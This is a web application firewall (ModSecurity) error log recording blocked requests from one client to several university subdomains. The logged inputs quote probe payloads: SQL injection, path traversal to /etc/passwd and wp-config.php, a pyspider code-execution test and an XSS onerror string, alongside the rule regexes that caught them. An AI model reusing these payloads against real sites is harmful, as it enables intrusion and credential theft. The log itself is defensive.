[Tue Aug 29 11:37:27.467309 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union SELECT found within ARGS:appno:  1 union SELECT 98989*443131,1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12B8Co-f0AAAV1EPcAAAAd"]
[Tue Aug 29 11:37:35.387574 2023] [:error] [pid 1488] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:log_filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12D8Co-f0AAAXQJ84AAAAj"]
[Tue Aug 29 11:37:35.389351 2023] [:error] [pid 1469] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:log_filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12D8Co-f0AAAW9Ic8AAAAI"]
[Tue Aug 29 11:37:35.389561 2023] [:error] [pid 1474] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:log_filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12D8Co-f0AAAXCUCoAAAAG"]
[Tue Aug 29 11:37:35.394343 2023] [:error] [pid 1476] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:log_filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12D8Co-f0AAAXEH4QAAAAN"]
[Tue Aug 29 11:37:35.427474 2023] [:error] [pid 1482] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:log_filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12D8Co-f0AAAXK58cAAAAY"]
[Tue Aug 29 11:37:36.368970 2023] [:error] [pid 1449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:appno. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union SELECT found within ARGS:appno:  1 union SELECT 98989*443131,1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12EMCo-f0AAAWpXlMAAAAW"]
[Tue Aug 29 11:37:37.414125 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "ZO12EcCo-f0AAAV1ESQAAAAd"]
[Tue Aug 29 11:37:37.523697 2023] [:error] [pid 1490] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "ZO12EcCo-f0AAAXSzpQAAAAA"]
[Tue Aug 29 11:37:37.524593 2023] [:error] [pid 1409] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "ZO12EcCo-f0AAAWBBVgAAAAB"]
[Tue Aug 29 11:37:37.526747 2023] [:error] [pid 1454] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "ZO12EcCo-f0AAAWurDcAAAAZ"]
[Tue Aug 29 11:37:37.594219 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "ZO12EcCo-f0AAAXA9gAAAAAO"]
[Tue Aug 29 11:37:43.532105 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 4"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/fuel/pages/items/"] [unique_id "ZO12F8Co-f0AAARiDqIAAAAJ"]
[Tue Aug 29 11:37:44.425868 2023] [:error] [pid 1474] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log_filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:log_filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12GMCo-f0AAAXCUGgAAAAG"]
[Tue Aug 29 11:37:45.352568 2023] [:error] [pid 1455] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:dbkey:syslog.rlog. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:dbkey:syslog.rlog: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/page/sl_logdl"] [unique_id "ZO12GcCo-f0AAAWvFKIAAAAa"]
[Tue Aug 29 11:37:45.392415 2023] [:error] [pid 1474] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:dbkey:syslog.rlog. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:dbkey:syslog.rlog: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/page/sl_logdl"] [unique_id "ZO12GcCo-f0AAAXCUGsAAAAG"]
[Tue Aug 29 11:37:45.417434 2023] [:error] [pid 1490] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php"] [unique_id "ZO12GcCo-f0AAAXSzuAAAAAA"]
[Tue Aug 29 11:37:45.457718 2023] [:error] [pid 1490] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:dbkey:syslog.rlog. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:dbkey:syslog.rlog: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/page/sl_logdl"] [unique_id "ZO12GcCo-f0AAAXSzuIAAAAA"]
[Tue Aug 29 11:37:45.479681 2023] [:error] [pid 1449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:dbkey:syslog.rlog. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:dbkey:syslog.rlog: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/page/sl_logdl"] [unique_id "ZO12GcCo-f0AAAWpXrMAAAAW"]
[Tue Aug 29 11:37:45.494657 2023] [:error] [pid 1474] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:dbkey:syslog.rlog. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:dbkey:syslog.rlog: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/page/sl_logdl"] [unique_id "ZO12GcCo-f0AAAXCUG8AAAAG"]
[Tue Aug 29 11:37:47.489440 2023] [:error] [pid 1476] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ):\\x0a     found within ARGS:script: from pyspider.libs.base_handler import *\\x0aclass Handler(BaseHandler):\\x0a    def on_start(self):\\x0a        print(str(452345672   567890765))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/debug/pyspidervulntest/run"] [unique_id "ZO12G8Co-f0AAAXEH@YAAAAN"]
[Tue Aug 29 11:37:47.491725 2023] [:error] [pid 1449] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ):\\x0a     found within ARGS:script: from pyspider.libs.base_handler import *\\x0aclass Handler(BaseHandler):\\x0a    def on_start(self):\\x0a        print(str(452345672   567890765))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/debug/pyspidervulntest/run"] [unique_id "ZO12G8Co-f0AAAWpXr0AAAAW"]
[Tue Aug 29 11:37:47.504522 2023] [:error] [pid 1454] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ):\\x0a     found within ARGS:script: from pyspider.libs.base_handler import *\\x0aclass Handler(BaseHandler):\\x0a    def on_start(self):\\x0a        print(str(452345672   567890765))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/debug/pyspidervulntest/run"] [unique_id "ZO12G8Co-f0AAAWurFYAAAAZ"]
[Tue Aug 29 11:37:47.508641 2023] [:error] [pid 1492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ):\\x0a     found within ARGS:script: from pyspider.libs.base_handler import *\\x0aclass Handler(BaseHandler):\\x0a    def on_start(self):\\x0a        print(str(452345672   567890765))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/debug/pyspidervulntest/run"] [unique_id "ZO12G8Co-f0AAAXU5IgAAAAD"]
[Tue Aug 29 11:37:47.548520 2023] [:error] [pid 1492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ):\\x0a     found within ARGS:script: from pyspider.libs.base_handler import *\\x0aclass Handler(BaseHandler):\\x0a    def on_start(self):\\x0a        print(str(452345672   567890765))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/debug/pyspidervulntest/run"] [unique_id "ZO12G8Co-f0AAAXU5IoAAAAD"]
[Tue Aug 29 11:37:50.415733 2023] [:error] [pid 1474] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bf_text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:bf_text: \\x22><img src=x onerror=console.log(123);>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO12HsCo-f0AAAXCUIkAAAAG"]
[Tue Aug 29 11:37:50.439193 2023] [:error] [pid 1467] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:dbkey:syslog.rlog. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:dbkey:syslog.rlog: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/page/sl_logdl"] [unique_id "ZO12HsCo-f0AAAW7FOUAAAAE"]
[Tue Aug 29 11:37:50.439381 2023] [:error] [pid 1476] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bf_text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:bf_text: \\x22><img src=x onerror=console.log(123);>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO12HsCo-f0AAAXEH-cAAAAN"]
[Tue Aug 29 11:37:50.476337 2023] [:error] [pid 1474] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bf_text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:bf_text: \\x22><img src=x onerror=console.log(123);>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO12HsCo-f0AAAXCUIoAAAAG"]
[Tue Aug 29 11:37:50.479637 2023] [:error] [pid 1454] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bf_text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:bf_text: \\x22><img src=x onerror=console.log(123);>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO12HsCo-f0AAAWurGcAAAAZ"]
[Tue Aug 29 11:37:50.502752 2023] [:error] [pid 1455] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bf_text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:bf_text: \\x22><img src=x onerror=console.log(123);>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO12HsCo-f0AAAWvFNgAAAAa"]
[Tue Aug 29 11:37:52.385587 2023] [:error] [pid 1455] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:next_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:next_file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/adm/file.cgi"] [unique_id "ZO12IMCo-f0AAAWvFNwAAAAa"]
[Tue Aug 29 11:37:52.386875 2023] [:error] [pid 1476] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:next_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:next_file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/adm/file.cgi"] [unique_id "ZO12IMCo-f0AAAXEH-wAAAAN"]
